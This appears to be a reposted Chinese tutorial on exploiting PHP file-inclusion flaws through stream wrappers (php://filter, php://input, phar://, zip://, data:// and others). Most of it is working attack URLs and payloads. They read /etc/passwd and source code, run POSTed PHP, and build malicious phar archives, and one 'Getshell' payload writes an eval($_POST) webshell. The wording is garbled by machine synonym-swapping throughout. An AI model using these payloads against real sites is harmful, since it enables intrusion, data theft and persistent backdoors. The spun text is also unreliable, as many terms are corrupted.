序言
这个手册紧张是记录针对PHP文件包含漏洞的利用思路与Bypass手腕的总结。
干系函数四个函数php中引发文件包含漏洞的常日紧张因此下四个函数:
1、include()

http://www.php.net/manual/en/function.include.php
2、include_once()
http://php.net/manual/en/function.include-once.php
3、require()
http://php.net/manual/en/function.require.php
4、require_once()
http://php.net/manual/en/function.require-once.php
函数功能
当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。
函数差异
include()
include() 函数包含出错的话,只会提出警告,不会影响后续语句的实行
require()
require() 函数包含出错的话,则会直接退出,后续语句不在实行
include_once() 和 require_once()
require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。
二次包含
一次包含
漏洞缘故原由
文件包含函数所加载的参数没有经由过滤或者严格的定义,可以被用户掌握,包含其他恶意文件,导致实行了非预期的代码。
漏洞分类LFILFI本地文件包含漏洞紧张是包含本地做事器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看做事器上的一些主要文件。但是,只有我们能够掌握包含的文件存储我们的恶意代码才能拿到做事器权限。
例如本地读取/etc/passwd系统主要文件
RFI
RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程做事器上的文件并实行。由于远程做事器的文件是我们可控的,因此漏洞一旦存在危害性会很大。 但RFI的利用条件较为苛刻,须要php.ini中进行配置
allow_url_fopen = On allow_url_include = Onallow_url_fopen = On
该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 工具文件等。
allow_url_include:On
该选项为on便是许可 包含URL 工具文件等。
两个配置选项均须要为On,才能远程包含文件成功
修正php.ini
在php.ini中,allow_url_fopen默认一贯是On,而allow_url_include从php5.2之后就默认为Off。
php5.5.9 -> php.ini
包含姿势php伪协议
PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。
file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流(I/O streams)zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档 ssh2:// — Secure Shell 2rar:// — RAR ogg:// — 音频流expect:// — 处理交互式的流
可以在phpinfo中的Registered PHP Streams中找到可利用的协议。
下面测试代码均为:
<?php $file = $_GET['file']; include($file); ?>
若有分外案例,会声明。
php.ini
allow_url_fopen 默认为 On allow_url_include 默认为 Off
若有分外哀求,会在利用条件里指出。
php://filterphp://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤运用。
参数
过滤器列表
字符串过滤器string.strip_tags转换过滤器压缩过滤器加密过滤器可用过滤器列表:https://www.php.net/manual/zh/filters.php
利用条件:无
利用姿势1:
index.php?file=php://filter/read=convert.base64-encode/resource=index.php
通过指定末端的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。
利用姿势2:
<?php $file = $_GET['file']; include($file); ?>
效果跟前面一样,只是少了个read关键字,在绕过一些waf时大概有用。file://专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取用法:
/path/to/file.ext relative/path/to/file.ext fileInCwd.ext C:/path/to/winfile.ext C:\path\to\winfile.ext \\smbserver\share\path\to\winfile.ext file:///path/to/file.ext ?file=file://[文件的绝对路径+文件名]
利用条件:无
利用姿势:
index.php?file=file:///etc/passwd
php://input是个可以访问要求的原始数据的只读流,将post要求中的数据作为PHP代码实行。
利用条件:
allow_url_include = On allow_url_fopen = On/Off
利用姿势:
index.php?file=php://input POST: <?php phpinfo();?>/<? phpinfo();?>
也可以利用burpsuite或curl进行利用
curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d "<?php phpinfo();?>"
Getshell
POST:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>
file_get_contents()的利用
file_get_contents()函数将全体文件读入一个字符串中
测试代码
<?php $file = $_GET['file']; if(file_get_contents($file,'r') == "Qftm"){ echo "you are Admin!!!"; } ?>
利用条件:无
利用姿势:
file_get.php?file=php://input POST:Qftm
php://input可以访问要求的原始数据的只读流。即可以直接读取到POST上没有经由解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。
phar://
phar:// 支持zip、phar格式的文件包含。
zip用法:
?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名] ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]
利用条件:php >= 5.3.0
利用姿势1:
合营文件上传漏洞,当仅可以上传zip格式时
index.php?file=phar://index.zip/index.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt
新建index.txt,利用zip格式压缩 -> index.zip
利用姿势2:
合营文件上传漏洞,当仅可以上传图片格式时
针对phar://不管后缀是什么,都会当做压缩包来解压。
index.php?file=phar://head.png/head.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt
将做好的zip后缀改为png格式
phar
phar文件实质上是也一种压缩文件。
用法:
?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名] ?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]
制作phar文件:
制作包含恶意代码文件的phar文件
(1)确保本地php.ini中phar.readonly=Off
(2)编写恶意phar文件的php脚本
?php @unlink("phar.phar"); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $phar->addFromString("head.txt", "<?php phpinfo();?>"); //添加要压缩的文件及内容 //署名自动打算 $phar->stopBuffering(); ?>
(3)天生phar文件
<?php$p = new PharData(dirname(FILE).'/phartest.aaa', 0,'phartest',Phar::ZIP) ;$p->addFromString('testfile.txt', '<?php phpinfo();?>');?>
利用条件:php >= 5.3.0
利用姿势1:
index.php?file=phar://phar.phar/head.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt
利用姿势2:
index.php?file=phar://phar.png/head.txt index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt
利用协议特性,变动后缀文件可适当绕过一些限定
zip://
`zip协议`和`phar协议`类似,都支持`相对路径`和`绝对路径`(险些网上所有人都说`zip协议`不支持`相对路径`,事实上是可以!
!
!
) 在`php version 5.2.9`时已经修复`zip://`相对路径问题
利用zip协议,需将`#`编码为`%23`(浏览器时)
用法:
?file=zip://[压缩包文件相对路径]#[压缩文件内的子文件名]?file=zip://[压缩包文件绝对路径]#[压缩文件内的子文件名]
利用条件:php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径) 利用姿势1:
index.php?file=zip://head.zip%23head.txt index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt
利用姿势2:
针对`zip://`不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限定。
index.php?file=zip://head.png%23head.txt index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt
相对路径 `php5.3.29 windows`
`php5.5.9 windows`
`5.4.16 Linux Centos7`
绝对路径
`windwos`
`Linux Centos7`
bzip2://
用法:
?file=compress.bzip2://[压缩包文件相对路径]?file=compress.bzip2://[压缩包文件绝对路径]
利用条件:php >= 5.2
利用姿势1:
index.php?file=compress.bzip2://head.bz2 index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2
相对路径
绝对路径
利用姿势2:
利用协议特性,变动后缀文件可适当绕过一些限定
index.php?file=compress.bzip2://head.jpg index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg
zlib://
用法:
?file=compress.zlib://[压缩包文件相对路径]?file=compress.zlib://[压缩包文件绝对路径]
利用条件:php >= 5.2
利用姿势1:
index.php?file=compress.zlib://head.gz index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz
相对路径
绝对路径
利用姿势2: 利用协议特性,变动后缀文件可适当绕过一些限定
index.php?file=compress.zlib://head.jpg index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg
data://
数据流封装器,和php://相似都是利用了流的观点
用法:
data:,<文本数据>data:text/plain,<文本数据>data:text/html, <HTML代码>data:text/html;base64,<base64编码的HTML代码>data:text/css, <CSS代码>data:text/css;base64, <base64编码的CSS代码>data:text/javascript,<Javascript代码>data:text/javascript;base64,<base64编码的Javascript代码>data:image/gif;base64,base64编码的gif图片数据data:image/png;base64,base64编码的png图片数据data:image/jpeg;base64,base64编码的jpeg图片数据data:image/x-icon;base64,base64编码的icon图片数据
利用条件:
php >= 5.2 allow_url_fopen = Onallow_url_include = On
利用姿势1:
index.php?file=data:text/plain,<?php phpinfo();?> index.php?file=data://text/plain,<?php phpinfo();?> ```
......未完待续
实验推举:文件包含漏洞-中级篇
http://hetianlab.com/expc.do?ce=364ed95b-3c22-4556-b658-85d4768a0a48
(先容文件包含时绕过限定的事理,以及先容利用文件包含漏洞读取源码的事理。)
声明:笔者初衷用于分享与遍及网络知识,若读者因此作出任何危害网络安全行为后果自大,与合天智汇及原作者无关!